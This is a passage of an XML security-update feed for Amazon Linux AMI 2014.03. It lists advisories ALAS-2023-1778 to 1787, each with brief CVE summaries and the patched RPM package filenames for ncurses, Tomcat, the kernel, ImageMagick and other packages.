</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34241" title="" id="CVE-2023-34241" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cups-debuginfo" version="1.4.2" release="67.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-debuginfo-1.4.2-67.22.amzn1.x86_64.rpm</filename></package><package name="cups-devel" version="1.4.2" release="67.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-devel-1.4.2-67.22.amzn1.x86_64.rpm</filename></package><package name="cups-php" version="1.4.2" release="67.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-php-1.4.2-67.22.amzn1.x86_64.rpm</filename></package><package name="cups-lpd" version="1.4.2" release="67.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-lpd-1.4.2-67.22.amzn1.x86_64.rpm</filename></package><package name="cups" version="1.4.2" release="67.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-1.4.2-67.22.amzn1.x86_64.rpm</filename></package><package name="cups-libs" version="1.4.2" release="67.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-libs-1.4.2-67.22.amzn1.x86_64.rpm</filename></package><package name="cups-php" version="1.4.2" release="67.22.amzn1" epoch="1" arch="i686"><filename>Packages/cups-php-1.4.2-67.22.amzn1.i686.rpm</filename></package><package name="cups-debuginfo" version="1.4.2" release="67.22.amzn1" epoch="1" arch="i686"><filename>Packages/cups-debuginfo-1.4.2-67.22.amzn1.i686.rpm</filename></package><package name="cups-libs" version="1.4.2" release="67.22.amzn1" epoch="1" arch="i686"><filename>Packages/cups-libs-1.4.2-67.22.amzn1.i686.rpm</filename></package><package name="cups-devel" version="1.4.2" release="67.22.amzn1" epoch="1" arch="i686"><filename>Packages/cups-devel-1.4.2-67.22.amzn1.i686.rpm</filename></package><package name="cups" version="1.4.2" release="67.22.amzn1" epoch="1" arch="i686"><filename>Packages/cups-1.4.2-67.22.amzn1.i686.rpm</filename></package><package name="cups-lpd" version="1.4.2" release="67.22.amzn1" epoch="1" arch="i686"><filename>Packages/cups-lpd-1.4.2-67.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1778</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1778: important priority package update for ncurses</title><issued date="2023-07-05 21:44:00" /><updated date="2023-07-19 21:50:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-29491:
ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491" title="" id="CVE-2023-29491" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ncurses-term" version="5.7" release="4.20090207.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ncurses-term-5.7-4.20090207.15.amzn1.x86_64.rpm</filename></package><package name="ncurses-base" version="5.7" release="4.20090207.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ncurses-base-5.7-4.20090207.15.amzn1.x86_64.rpm</filename></package><package name="ncurses-debuginfo" version="5.7" release="4.20090207.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ncurses-debuginfo-5.7-4.20090207.15.amzn1.x86_64.rpm</filename></package><package name="ncurses" version="5.7" release="4.20090207.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ncurses-5.7-4.20090207.15.amzn1.x86_64.rpm</filename></package><package name="ncurses-static" version="5.7" release="4.20090207.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ncurses-static-5.7-4.20090207.15.amzn1.x86_64.rpm</filename></package><package name="ncurses-libs" version="5.7" release="4.20090207.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ncurses-libs-5.7-4.20090207.15.amzn1.x86_64.rpm</filename></package><package name="ncurses-devel" version="5.7" release="4.20090207.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ncurses-devel-5.7-4.20090207.15.amzn1.x86_64.rpm</filename></package><package name="ncurses-devel" version="5.7" release="4.20090207.15.amzn1" epoch="0" arch="i686"><filename>Packages/ncurses-devel-5.7-4.20090207.15.amzn1.i686.rpm</filename></package><package name="ncurses-libs" version="5.7" release="4.20090207.15.amzn1" epoch="0" arch="i686"><filename>Packages/ncurses-libs-5.7-4.20090207.15.amzn1.i686.rpm</filename></package><package name="ncurses-debuginfo" version="5.7" release="4.20090207.15.amzn1" epoch="0" arch="i686"><filename>Packages/ncurses-debuginfo-5.7-4.20090207.15.amzn1.i686.rpm</filename></package><package name="ncurses-static" version="5.7" release="4.20090207.15.amzn1" epoch="0" arch="i686"><filename>Packages/ncurses-static-5.7-4.20090207.15.amzn1.i686.rpm</filename></package><package name="ncurses-base" version="5.7" release="4.20090207.15.amzn1" epoch="0" arch="i686"><filename>Packages/ncurses-base-5.7-4.20090207.15.amzn1.i686.rpm</filename></package><package name="ncurses-term" version="5.7" release="4.20090207.15.amzn1" epoch="0" arch="i686"><filename>Packages/ncurses-term-5.7-4.20090207.15.amzn1.i686.rpm</filename></package><package name="ncurses" version="5.7" release="4.20090207.15.amzn1" epoch="0" arch="i686"><filename>Packages/ncurses-5.7-4.20090207.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1779</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1779: important priority package update for tomcat8</title><issued date="2023-07-05 21:44:00" /><updated date="2023-07-19 21:50:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-28709:
The fix for CVE-2023-24998 was incomplete for Apache Tomcat 11.0.0-M2 to 11.0.0-M4, 10.1.5 to 10.1.7, 9.0.71 to 9.0.73 and 8.5.85 to 8.5.87. If non-default HTTP connector settings were used such that the maxParameterCount could be reached using query string parameters and a request was submitted that supplied exactly maxParameterCount parameters in the query string, the limit for uploaded request parts could be bypassed with the potential for a denial of service to occur.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28709" title="" id="CVE-2023-28709" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-log4j" version="8.5.89" release="1.93.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.89-1.93.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.89" release="1.93.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.89-1.93.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.89" release="1.93.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.89-1.93.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.89" release="1.93.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.89-1.93.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.89" release="1.93.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.89-1.93.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.89" release="1.93.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.89-1.93.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.89" release="1.93.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.89-1.93.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.89" release="1.93.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.89-1.93.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.89" release="1.93.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.89-1.93.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.89" release="1.93.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.89-1.93.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1780</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1780: medium priority package update for c-ares</title><issued date="2023-07-05 21:44:00" /><updated date="2023-07-19 21:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-4904:
A flaw was found in the c-ares package. The ares_set_sortlist is missing checks about the validity of the input string, which allows a possible arbitrary length stack overflow. This issue may cause a denial of service or a limited impact on confidentiality and integrity.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4904" title="" id="CVE-2022-4904" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="c-ares" version="1.17.2" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/c-ares-1.17.2-1.10.amzn1.x86_64.rpm</filename></package><package name="c-ares-debuginfo" version="1.17.2" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/c-ares-debuginfo-1.17.2-1.10.amzn1.x86_64.rpm</filename></package><package name="c-ares-devel" version="1.17.2" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/c-ares-devel-1.17.2-1.10.amzn1.x86_64.rpm</filename></package><package name="c-ares-debuginfo" version="1.17.2" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/c-ares-debuginfo-1.17.2-1.10.amzn1.i686.rpm</filename></package><package name="c-ares" version="1.17.2" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/c-ares-1.17.2-1.10.amzn1.i686.rpm</filename></package><package name="c-ares-devel" version="1.17.2" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/c-ares-devel-1.17.2-1.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1781</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1781: medium priority package update for ImageMagick</title><issued date="2023-07-13 23:57:00" /><updated date="2023-07-19 21:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-3428:
The upstream bug report describes this issue as follows:
"A vulnerability was found in ImageMagick <=7.1.1, where heap-based buffer overflow was found in coders/tiff.c."
CVE-2023-3195:
stack overflow when parsing malicious tiff image
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3195" title="" id="CVE-2023-3195" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3428" title="" id="CVE-2023-3428" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ImageMagick-c++-devel" version="6.9.10.97" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-devel-6.9.10.97-1.26.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.97" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-devel-6.9.10.97-1.26.amzn1.x86_64.rpm</filename></package><package name="ImageMagick" version="6.9.10.97" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-6.9.10.97-1.26.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.97" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-debuginfo-6.9.10.97-1.26.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.97" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-6.9.10.97-1.26.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.97" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-doc-6.9.10.97-1.26.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.97" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-perl-6.9.10.97-1.26.amzn1.x86_64.rpm</filename></package><package name="ImageMagick" version="6.9.10.97" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-6.9.10.97-1.26.amzn1.i686.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.97" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-doc-6.9.10.97-1.26.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.9.10.97" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-devel-6.9.10.97-1.26.amzn1.i686.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.97" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-debuginfo-6.9.10.97-1.26.amzn1.i686.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.97" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-devel-6.9.10.97-1.26.amzn1.i686.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.97" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-perl-6.9.10.97-1.26.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.97" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-6.9.10.97-1.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1782</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1782: medium priority package update for libX11</title><issued date="2023-07-13 23:57:00" /><updated date="2023-07-19 21:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-3138:
A vulnerability was found in libX11. The security flaw occurs because the functions in src/InitExt.c in libX11 do not check that the values provided for the Request, Event, or Error IDs are within the bounds of the arrays that those functions write to, using those IDs as array indexes. They trust that they were called with values provided by an Xserver adhering to the bounds specified in the X11 protocol, as all X servers provided by X.Org do. As the protocol only specifies a single byte for these values, an out-of-bounds value provided by a malicious server (or a malicious proxy-in-the-middle) can only overwrite other portions of the Display structure and not write outside the bounds of the Display structure itself, possibly causing the client to crash with this memory corruption.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3138" title="" id="CVE-2023-3138" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libX11" version="1.6.0" release="2.2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-1.6.0-2.2.15.amzn1.x86_64.rpm</filename></package><package name="libX11-common" version="1.6.0" release="2.2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-common-1.6.0-2.2.15.amzn1.x86_64.rpm</filename></package><package name="libX11-debuginfo" version="1.6.0" release="2.2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-debuginfo-1.6.0-2.2.15.amzn1.x86_64.rpm</filename></package><package name="libX11-devel" version="1.6.0" release="2.2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-devel-1.6.0-2.2.15.amzn1.x86_64.rpm</filename></package><package name="libX11" version="1.6.0" release="2.2.15.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-1.6.0-2.2.15.amzn1.i686.rpm</filename></package><package name="libX11-devel" version="1.6.0" release="2.2.15.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-devel-1.6.0-2.2.15.amzn1.i686.rpm</filename></package><package name="libX11-debuginfo" version="1.6.0" release="2.2.15.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-debuginfo-1.6.0-2.2.15.amzn1.i686.rpm</filename></package><package name="libX11-common" version="1.6.0" release="2.2.15.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-common-1.6.0-2.2.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1783</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1783: important priority package update for kernel</title><issued date="2023-07-13 23:57:00" /><updated date="2023-07-19 21:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-35001:
Linux Kernel nftables Out-Of-Bounds Read/Write Vulnerability; nft_byteorder poorly handled vm register contents when CAP_NET_ADMIN is in any user or network namespace
CVE-2023-3117:
A use-after-free flaw was found in the Netfilter subsystem of the Linux kernel when processing named and anonymous sets in batch requests, which can lead to performing arbitrary reads and writes in kernel memory. This flaw allows a local user with CAP_NET_ADMIN capability to crash or potentially escalate their privileges on the system.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3117" title="" id="CVE-2023-3117" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-35001" title="" id="CVE-2023-35001" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="4.14.320" release="168.534.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.320-168.534.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.320" release="168.534.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.320-168.534.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.320" release="168.534.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.320-168.534.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.320" release="168.534.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.320-168.534.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.320" release="168.534.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.320-168.534.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.320" release="168.534.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.320-168.534.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.320" release="168.534.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.320-168.534.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.320" release="168.534.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.320-168.534.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.320" release="168.534.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.320-168.534.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.320" release="168.534.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.320-168.534.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.320" release="168.534.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.320-168.534.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.320" release="168.534.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.320-168.534.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.320" release="168.534.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.320-168.534.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.320" release="168.534.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.320-168.534.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.320" release="168.534.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.320-168.534.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.320" release="168.534.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.320-168.534.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.320" release="168.534.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.320-168.534.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.320" release="168.534.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.320-168.534.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.320" release="168.534.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.320-168.534.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.320" release="168.534.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.320-168.534.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1784</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1784: important priority package update for golang</title><issued date="2023-07-13 23:57:00" /><updated date="2023-07-19 21:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-29402:
The go command may generate unexpected code at build time when using cgo. This may result in unexpected behavior when running a go program which uses cgo. This may occur when running an untrusted module which contains directories with newline characters in their names. Modules which are retrieved using the go command, i.e. via "go get", are not affected (modules retrieved using GOPATH-mode, i.e. GO111MODULE=off, may be affected).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29402" title="" id="CVE-2023-29402" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang" version="1.18.6" release="1.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.18.6-1.45.amzn1.x86_64.rpm</filename></package><package name="golang-shared" version="1.18.6" release="1.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-shared-1.18.6-1.45.amzn1.x86_64.rpm</filename></package><package name="golang-src" version="1.18.6" release="1.45.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.18.6-1.45.amzn1.noarch.rpm</filename></package><package name="golang-tests" version="1.18.6" release="1.45.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.18.6-1.45.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.18.6" release="1.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.18.6-1.45.amzn1.x86_64.rpm</filename></package><package name="golang-race" version="1.18.6" release="1.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.18.6-1.45.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.18.6" release="1.45.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.18.6-1.45.amzn1.noarch.rpm</filename></package><package name="golang-misc" version="1.18.6" release="1.45.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.18.6-1.45.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.18.6" release="1.45.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.18.6-1.45.amzn1.i686.rpm</filename></package><package name="golang" version="1.18.6" release="1.45.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.18.6-1.45.amzn1.i686.rpm</filename></package><package name="golang-shared" version="1.18.6" release="1.45.amzn1" epoch="0" arch="i686"><filename>Packages/golang-shared-1.18.6-1.45.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1785</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1785: low priority package update for wireshark</title><issued date="2023-07-13 23:57:00" /><updated date="2023-07-19 21:51:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-0667:
Due to failure in validating the length provided by an attacker-crafted MSMMS packet, Wireshark version 4.0.5 and prior, in an unusual configuration, is susceptible to a heap-based buffer overflow, and possibly code execution in the context of the process running Wireshark.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0667" title="" id="CVE-2023-0667" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="wireshark-devel" version="1.8.10" release="25.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-devel-1.8.10-25.24.amzn1.x86_64.rpm</filename></package><package name="wireshark-debuginfo" version="1.8.10" release="25.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-debuginfo-1.8.10-25.24.amzn1.x86_64.rpm</filename></package><package name="wireshark" version="1.8.10" release="25.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-1.8.10-25.24.amzn1.x86_64.rpm</filename></package><package name="wireshark-devel" version="1.8.10" release="25.24.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-devel-1.8.10-25.24.amzn1.i686.rpm</filename></package><package name="wireshark-debuginfo" version="1.8.10" release="25.24.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-debuginfo-1.8.10-25.24.amzn1.i686.rpm</filename></package><package name="wireshark" version="1.8.10" release="25.24.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-1.8.10-25.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1786</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1786: medium priority package update for busybox</title><issued date="2023-07-13 23:57:00" /><updated date="2023-07-19 21:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-30065:
A use-after-free in Busybox 1.35-x's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the copyvar function.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30065" title="" id="CVE-2022-30065" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="busybox-petitboot" version="1.34.1" release="1.15.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-petitboot-1.34.1-1.15.amzn1.x86_64.rpm</filename></package><package name="busybox" version="1.34.1" release="1.15.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-1.34.1-1.15.amzn1.x86_64.rpm</filename></package><package name="busybox-debuginfo" version="1.34.1" release="1.15.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-debuginfo-1.34.1-1.15.amzn1.x86_64.rpm</filename></package><package name="busybox-debuginfo" version="1.34.1" release="1.15.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-debuginfo-1.34.1-1.15.amzn1.i686.rpm</filename></package><package name="busybox" version="1.34.1" release="1.15.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-1.34.1-1.15.amzn1.i686.rpm</filename></package><package name="busybox-petitboot" version="1.34.1" release="1.15.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-petitboot-1.34.1-1.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1787</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1787: medium priority package update for python-imaging</title><issued date="2023-07-13 23:57:00" /><updated date="2023-07-19 21:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-9190:
Pillow before 3.3.2 allows context-dependent attackers to execute arbitrary code by using the "crafted image file" approach, related to an "Insecure Sign Extension" issue affecting the ImagingNew in Storage.c component.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9190" title="" id="CVE-2016-9190" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-imaging-devel" version="1.1.6" release="19.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-imaging-devel-1.1.6-19.10.amzn1.x86_64.rpm</filename></package><package name="python26-imaging" version="1.1.6" release="19.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-imaging-1.1.6-19.10.amzn1.x86_64.rpm</filename></package><package name="python-imaging-debuginfo" version="1.1.6" release="19.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python-imaging-debuginfo-1.1.6-19.10.amzn1.x86_64.rpm</filename></package><package name="python27-imaging-devel" version="1.1.6" release="19.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-imaging-devel-1.1.6-19.10.amzn1.x86_64.rpm</filename></package><package name="python27-imaging" version="1.1.6" release="19.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-imaging-1.1.6-19.10.amzn1.x86_64.rpm</filename></package><package name="python27-imaging" version="1.1.6" release="19.10.amzn1" epoch="0" arch="i686"><filename>Packages/python27-imaging-1.1.6-19.10.amzn1.i686.rpm</filename></package><package name="python27-imaging-devel" version="1.1.6" release="19.10.amzn1" epoch="0" arch="i686"><filename>Packages/python27-imaging-devel-1.1.6-19.10.amzn1.i686.rpm</filename></package><package name="python26-imaging" version="1.1.6" release="19.10.amzn1" epoch="0" arch="i686"><filename>Packages/python26-imaging-1.1.6-19.10.amzn1.i686.rpm</filename></package><package name="python-imaging-debuginfo" version="1.1.6" release="19.10.amzn1" epoch="0" arch="i686"><filename>Packages/python-imaging-debuginfo-1.1.6-19.10.amzn1.i686.rpm</filename></package><package name="python26-imaging-devel" version="1.1.6" release="19.10.amzn1" epoch="0" arch="i686"><filename>Packages/python26-imaging-devel-1.1.6-19.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 